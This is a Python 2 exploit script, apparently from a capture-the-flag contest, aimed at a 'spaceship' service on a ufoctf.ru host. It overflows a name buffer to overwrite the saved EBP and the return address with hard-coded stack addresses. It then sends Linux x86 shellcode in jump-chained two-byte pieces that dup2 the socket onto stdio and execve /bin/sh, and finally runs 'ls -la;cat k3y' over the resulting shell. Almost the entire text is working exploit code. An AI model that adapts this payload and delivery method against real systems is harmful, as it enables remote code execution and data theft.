- # aXs^Big-Daddy - http://codezen.fr
- import socket
- import telnetlib
- from struct import pack,unpack
- import time
# Stage payload for 32-bit Linux (int 0x80): dup2() the client socket over
# stderr/stdout/stdin, then execve("/bin/sh", NULL, NULL).
#
# Delivery constraint: the driver below sends this two bytes at a time, with a
# short jmp appended to every pair so each "ship part" chains into the next
# slot.  Every entry in the tuple is therefore exactly 2 bytes, and odd-length
# instruction sequences are padded with a nop (\x90).  Keep that invariant
# when editing.
#
# Register contract at entry: ecx is expected to point 20 bytes before the
# "/bin/sh" string in the name buffer (the execve part computes
# ebx = ecx + 0xb + 9).  NOTE(review): presumably a value the vulnerable
# function leaves in ecx -- confirm against the binary.
_SHELLCODE_PIECES = (
    "\x89\xcf",  # mov edi, ecx      ; keep the buffer pointer across the syscalls
    # dup2(4, 2), dup2(4, 1), dup2(4, 0): route stdio through fd 4 (the socket)
    "\x31\xc0",  # xor eax, eax
    "\x31\xdb",  # xor ebx, ebx
    "\x31\xc9",  # xor ecx, ecx
    "\xb1\x02",  # mov cl, 2         ; newfd = stderr
    "\xb0\x3f",  # mov al, 0x3f      ; SYS_dup2
    "\xb3\x04",  # mov bl, 4         ; oldfd = socket
    "\xcd\x80",  # int 0x80
    "\xb1\x01",  # mov cl, 1         ; newfd = stdout
    "\xb0\x3f",  # mov al, 0x3f
    "\xb3\x04",  # mov bl, 4
    "\xcd\x80",  # int 0x80
    "\xb1\x00",  # mov cl, 0         ; newfd = stdin
    "\xb0\x3f",  # mov al, 0x3f
    "\xb3\x04",  # mov bl, 4
    "\xcd\x80",  # int 0x80
    # execve("/bin/sh", NULL, NULL)
    "\x89\xfb",  # mov ebx, edi      ; back to the saved buffer pointer
    "\x31\xc9",  # xor ecx, ecx      ; argv = NULL
    "\xf7\xe1",  # mul ecx           ; eax = edx = 0 (envp = NULL)
    "\xb0\x0b",  # mov al, 0xb
    "\x90\x51",  # nop ; push ecx
    "\x01\xc3",  # add ebx, eax      ; ebx += 11
    "\x43\x43",  # inc ebx ; inc ebx
    "\x43\x43",  # inc ebx ; inc ebx
    "\x43\x43",  # inc ebx ; inc ebx
    "\x43\x43",  # inc ebx ; inc ebx
    "\x43\x90",  # inc ebx ; nop     ; ebx = saved ptr + 20 -> "/bin/sh"
    "\x89\xdf",  # mov edi, ebx
    "\x47\x47",  # inc edi ; inc edi
    "\x47\x47",  # inc edi ; inc edi
    "\x47\x47",  # inc edi ; inc edi
    "\x47\x90",  # inc edi ; nop     ; edi = ebx + 7, the \xFF right after "/bin/sh"
    "\x31\xc0",  # xor eax, eax
    "\xaa\x90",  # stosb ; nop       ; overwrite \xFF with the NUL execve needs
    "\xb0\x0b",  # mov al, 0xb       ; SYS_execve
    "\xcd\x80",  # int 0x80
)

# 72 bytes of code followed by a nop trailer.  The send loop only ever
# transmits 75 pieces (150 bytes), so most of the trailer is never used.
shellcode = "".join(_SHELLCODE_PIECES) + "\x90" * 256
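host = 'spaceship.tasks.ufoctf.ru'
port = 4141

# Where the overwritten return address jumps: the first shellcode slot on the
# target's stack.  It is hard-coded, so this only works while the service runs
# with ASLR disabled (a fixed 0xbf... 32-bit stack address); compare it with
# the pointers read_leak() prints and re-derive it if the layout moves.
# Value used against an earlier instance: 0xbfffeea4
SHELLCODE_ADDR = 0xbfe67e24
SAVED_EBP = 0x0804B074   # written over the saved EBP; looks like a static-data address, not verified here
SOCKET_FD = 4            # fd the shellcode dup2()s stdio onto; the client socket is assumed to be fd 4
CHUNK_COUNT = 75         # number of 2-byte shellcode pieces ("ship parts") sent
CHUNK_JMP = "\xEB\x2C"   # jmp short +0x2c appended to every piece so it chains into the next slot
CHUNK_DELAY = 3          # seconds between pieces

# NOTE(review): this script is Python 2 (str payloads concatenated with
# struct.pack output, telnetlib); telnetlib is removed in Python 3.13.


def build_name(shellcode_addr=SHELLCODE_ADDR, saved_ebp=SAVED_EBP, fd=SOCKET_FD):
    """Return the "Name your spaceship" payload that overflows the name buffer.

    Layout, all little-endian:
      "/bin/sh\\xFF" | 4-byte slot | fd | 4 filler bytes | saved EBP | return address
    The \\xFF after "/bin/sh" keeps the payload NUL-free; the shellcode later
    replaces it with the NUL that execve needs.  The 4-byte slot is
    overwritten by the target (presumably with a pointer, which read_leak()
    reads back) -- confirm against the binary.
    """
    return "".join([
        "/bin/sh\xFF",
        'Y' * 4,
        pack('<I', fd),
        'Z' * 4,
        pack('<I', saved_ebp),
        pack('<I', shellcode_addr),
    ])


def shellcode_chunks(code, count=CHUNK_COUNT, jmp=CHUNK_JMP):
    """Yield the ``count`` two-byte pieces of ``code`` in send order.

    Pieces go out last-first: piece i carries code[2*(count-1-i):2*(count-1-i)+2]
    followed by ``jmp``, so the piece sent first lands in the highest slot and
    the entry point is sent last.  Only the first 2*count bytes of ``code`` are
    used.
    """
    for i in range(count):
        off = (count - 1 - i) * 2
        yield code[off:off + 2] + jmp


def recv_exact(sock, n):
    """Read exactly ``n`` bytes; raise EOFError if the peer closes first.

    A bare recv(n) may return fewer bytes, which would make unpack() fail.
    """
    buf = ""
    while len(buf) < n:
        part = sock.recv(n - len(buf))
        if not part:
            raise EOFError("connection closed after %d of %d bytes" % (len(buf), n))
        buf += part
    return buf


def recv_until_byte(sock, marker):
    """Consume bytes until ``marker`` is seen; raise EOFError if the peer closes.

    The original loop spun forever on a closed socket because recv() then
    returns "" and never equals the marker.
    """
    while True:
        b = sock.recv(1)
        if not b:
            raise EOFError("connection closed before %r was seen" % marker)
        if b == marker:
            return


def read_leak(sock):
    """Skip to the \\xFF the service echoes back, then print the fields after it.

    Returns the three 32-bit values in the order received; the 8 bytes between
    the first and second value (fd + filler in build_name) are printed as-is.
    """
    recv_until_byte(sock, "\xFF")
    ptr1 = unpack('<I', recv_exact(sock, 4))[0]
    print("ptr= %s" % hex(ptr1))
    print("dummy= %r" % recv_exact(sock, 8))
    ptr2 = unpack('<I', recv_exact(sock, 4))[0]
    print("ptr= %s" % hex(ptr2))
    ptr3 = unpack('<I', recv_exact(sock, 4))[0]
    print("ptr= %s" % hex(ptr3))
    return ptr1, ptr2, ptr3


def dump_until_closed(sock):
    """Print everything the peer sends until it closes the connection."""
    while True:
        data = sock.recv(1024)
        if not data:
            break
        print(data)


def main():
    """Overflow the name, deliver the chunked shellcode, then read the flag."""
    tn = telnetlib.Telnet(host, port)
    try:
        time.sleep(1)
        s = tn.get_socket()
        print(tn.read_until("Name your spaceship:"))
        # sendall: plain send() may write only part of the payload.
        s.sendall(build_name())
        print(tn.read_until("Build your ship:\n"))
        for i, piece in enumerate(shellcode_chunks(shellcode)):
            print("%d %r" % (i, piece))
            s.sendall(piece)
            # NOTE(review): the paste lost its indentation, so it is unclear
            # whether the original slept once after the loop or after every
            # piece.  Pacing every piece is the conservative reading: it keeps
            # consecutive 4-byte sends from being coalesced into one read.
            time.sleep(CHUNK_DELAY)
        read_leak(s)
        time.sleep(3)  # presumably gives the spawned shell time to come up
        s.sendall("ls -la;cat k3y\n")
        dump_until_closed(s)
    finally:
        tn.close()


if __name__ == "__main__":
    main()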